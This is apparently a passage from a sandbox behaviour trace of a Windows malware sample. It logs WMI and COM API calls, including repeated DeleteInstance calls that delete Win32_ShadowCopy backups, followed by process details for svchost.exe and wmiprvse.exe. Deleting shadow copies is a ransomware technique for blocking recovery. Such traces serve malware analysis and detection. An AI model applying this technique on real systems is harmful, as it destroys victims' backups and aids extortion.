0x0 [0146.928] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0146.928] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0146.929] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0146.929] WbemDefPath:IWbemPath:GetText (in: This=0x1be53790, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0146.929] WbemDefPath:IWbemPath:GetText (in: This=0x1be53790, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"") returned 0x0 [0146.929] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0147.846] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0147.846] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be601d0, puReturned=0x1c90de18*=0x1) returned 0x0 [0147.850] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be601d0) returned 0x0 [0147.850] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0147.850] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0147.851] IUnknown:AddRef (This=0x1be601d0) returned 0x3 [0147.851] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0147.851] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be601d8) returned 0x0 [0147.851] IMarshal:GetUnmarshalClass (in: This=0x1be601d8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0147.851] IUnknown:Release (This=0x1be601d8) returned 0x3 [0147.852] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0147.852] IUnknown:AddRef (This=0x1be601d0) returned 0x4 [0147.852] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0147.852] IUnknown:Release (This=0x1be601d0) returned 0x3 [0147.852] IUnknown:Release (This=0x1be601d0) returned 0x2 [0147.852] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0147.852] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0147.852] IUnknown:AddRef (This=0x1be601d0) returned 0x3 [0147.853] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be601d0) returned 0x0 [0147.853] IUnknown:Release (This=0x1be601d0) returned 0x3 [0147.853] IUnknown:Release (This=0x1be601d0) returned 0x2 [0147.853] IUnknown:Release (This=0x1be601d0) returned 0x1 [0147.853] CoTaskMemFree (pv=0x16a900) [0147.853] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0147.853] IUnknown:AddRef (This=0x1be601d0) returned 0x2 [0147.853] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0147.854] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0147.854] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"") returned 0x53 [0147.854] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0147.854] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0147.854] IUnknown:QueryInterface (in: This=0x142498, riid=0x2fcaaf0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0147.854] IUnknown:Release (This=0x142498) returned 0x1 [0147.856] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be41c00) returned 0x0 [0147.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41c00, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0147.857] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41c00, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53850) returned 0x0 [0147.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53850, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53850) returned 0x0 [0147.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53850, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0147.858] WbemDefPath:IUnknown:AddRef (This=0x1be53850) returned 0x3 [0147.858] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0147.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53850, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b929e80) returned 0x0 [0147.858] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b929e80, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0147.858] WbemDefPath:IUnknown:Release (This=0x1b929e80) returned 0x3 [0147.858] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0147.858] WbemDefPath:IUnknown:AddRef (This=0x1be53850) returned 0x4 [0147.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53850, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0147.858] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x3 [0147.859] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x2 [0147.859] WbemDefPath:IUnknown:Release (This=0x1be41c00) returned 0x0 [0147.859] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x1 [0147.859] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0147.859] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0147.859] WbemDefPath:IUnknown:AddRef (This=0x1be53850) returned 0x2 [0147.859] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53850, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53850) returned 0x0 [0147.860] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x2 [0147.860] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x1 [0147.860] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0147.860] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0147.860] WbemDefPath:IUnknown:AddRef (This=0x1be53850) returned 0x2 [0147.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53850, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53850) returned 0x0 [0147.860] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x2 [0147.860] WbemDefPath:IUnknown:AddRef (This=0x1be53850) returned 0x3 [0147.860] WbemDefPath:IWbemPath:SetText (This=0x1be53850, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"") returned 0x0 [0147.861] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x2 [0147.861] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0147.861] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0147.861] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0147.862] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0147.862] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0147.862] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0147.862] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0147.862] SysStringLen (param_1="root\\cimv2") returned 0xa [0147.862] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0147.862] SysStringLen (param_1="root\\cimv2") returned 0xa [0147.862] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0147.862] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0147.863] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0147.863] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0147.863] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0147.863] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0147.863] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0147.868] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53850, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0147.868] WbemDefPath:IWbemPath:GetText (in: This=0x1be53850, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0147.868] WbemDefPath:IWbemPath:GetText (in: This=0x1be53850, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"") returned 0x0 [0147.868] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0147.868] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0147.868] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0147.868] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0147.868] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0147.868] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0147.868] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0147.868] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0147.868] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0147.869] WbemDefPath:IWbemPath:GetText (in: This=0x1be53850, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0147.869] WbemDefPath:IWbemPath:GetText (in: This=0x1be53850, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"") returned 0x0 [0147.869] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0147.989] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0147.990] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x0, puReturned=0x1c90de18*=0x0) returned 0x1 [0147.991] CoTaskMemFree (pv=0x16a900) [0147.996] CoGetContextToken (in: pToken=0x1c90dba0 | out: pToken=0x1c90dba0) returned 0x0 [0147.996] WbemLocator:IUnknown:Release (This=0x1b922160) returned 0x1 [0147.996] IUnknown:Release (This=0x1be44788) returned 0x0 [0148.007] SetEvent (hEvent=0x398) returned 1 [0148.007] SetEvent (hEvent=0x38c) returned 1 [0148.007] SetEvent (hEvent=0x390) returned 1 [0148.007] SetEvent (hEvent=0x394) returned 1 [0148.007] SetEvent (hEvent=0x3a4) returned 1 [0148.007] SetEvent (hEvent=0x39c) returned 1 [0148.008] SetEvent (hEvent=0x3bc) returned 1 [0148.008] SetEvent (hEvent=0x380) returned 1 [0148.008] SetEvent (hEvent=0x3a8) returned 1 [0148.009] CoUninitialize () Thread: id = 10 os_tid = 0x888 Thread: id = 11 os_tid = 0x898 Thread: id = 12 os_tid = 0xb64 Thread: id = 114 os_tid = 0x908 [0148.041] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0148.045] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0148.047] VirtualQuery (in: lpAddress=0x1c97d620, lpBuffer=0x1c97e4e0, dwLength=0x30 | out: lpBuffer=0x1c97e4e0*(BaseAddress=0x1c97d000, AllocationBase=0x1bff0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0148.049] VirtualQuery (in: lpAddress=0x1c97d8d0, lpBuffer=0x1c97e790, dwLength=0x30 | out: lpBuffer=0x1c97e790*(BaseAddress=0x1c97d000, AllocationBase=0x1bff0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0148.067] SetEvent (hEvent=0x484) returned 1 [0148.067] SetEvent (hEvent=0x34c) returned 1 [0148.067] SetEvent (hEvent=0x46c) returned 1 [0148.067] SetEvent (hEvent=0x484) returned 1 [0148.067] SetEvent (hEvent=0x34c) returned 1 [0148.067] SetEvent (hEvent=0x3e0) returned 1 [0148.068] SetEvent (hEvent=0x1cc) returned 1 [0148.068] SetEvent (hEvent=0x1d4) returned 1 [0148.068] SetEvent (hEvent=0x1d0) returned 1 [0148.069] SetEvent (hEvent=0x3e4) returned 1 [0148.106] CoUninitialize () Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 13 os_tid = 0x618 Thread: id = 14 os_tid = 0xb60 Thread: id = 15 os_tid = 0xb3c Thread: id = 16 os_tid = 0xb70 Thread: id = 17 os_tid = 0xb6c Thread: id = 18 os_tid = 0xb74 Thread: id = 19 os_tid = 0xb68 Thread: id = 20 os_tid = 0xb24 Thread: id = 21 os_tid = 0xb50 Thread: id = 22 os_tid = 0xb28 Thread: id = 23 os_tid = 0x868 Thread: id = 24 os_tid = 0x858 Thread: id = 25 os_tid = 0x828 Thread: id = 26 os_tid = 0x818 Thread: id = 27 os_tid = 0x5d8 Thread: id = 28 os_tid = 0x320 Thread: id = 29 os_tid = 0x6cc Thread: id = 30 os_tid = 0x42c Thread: id = 31 os_tid = 0x1e4 Thread: id = 32 os_tid = 0x760 Thread: id = 33 os_tid = 0x75c Thread: id = 34 os_tid = 0x74c Thread: id = 35 os_tid = 0x710 Thread: id = 36 os_tid = 0x6d0 Thread: id = 37 os_tid = 0x6bc Thread: id = 38 os_tid = 0x6b8 Thread: id = 39 os_tid = 0x6b0 Thread: id = 40 os_tid = 0x6a8 Thread: id = 41 os_tid = 0x69c Thread: id = 42 os_tid = 0x698 Thread: id = 43 os_tid = 0x688 Thread: id = 44 os_tid = 0x684 Thread: id = 45 os_tid = 0x678 Thread: id = 46 os_tid = 0x4a8 Thread: id = 47 os_tid = 0x46c Thread: id = 48 os_tid = 0x44c Thread: id = 49 os_tid = 0x424 Thread: id = 50 os_tid = 0x420 Thread: id = 51 os_tid = 0x41c Thread: id = 52 os_tid = 0x404 Thread: id = 53 os_tid = 0x14c Thread: id = 54 os_tid = 0x158 Thread: id = 55 os_tid = 0x3fc Thread: id = 56 os_tid = 0x3f4 Thread: id = 57 os_tid = 0x3e8 Thread: id = 58 os_tid = 0x39c Thread: id = 59 os_tid = 0x390 Thread: id = 60 os_tid = 0x38c Thread: id = 61 os_tid = 0x388 Thread: id = 62 os_tid = 0x37c Thread: id = 63 os_tid = 0x374 Thread: id = 112 os_tid = 0xb20 Thread: id = 123 os_tid = 0x630 Thread: id = 124 os_tid = 0x5e4 Thread: id = 125 os_tid = 0x30c Thread: id = 2589 os_tid = 0xcdc Thread: id = 2590 os_tid = 0xce4 Thread: id = 2591 os_tid = 0xce8 Thread: id = 2592 os_tid = 0xcec Thread: id = 2595 os_tid = 0xd1c Thread: id = 2634 os_tid = 0xd28 Thread: id = 2635 os_tid = 0xd6c Thread: id = 2636 os_tid = 0xd7c Thread: id = 2647 os_tid = 0xe2c Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61e69000" os_pid = "0xa40" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = 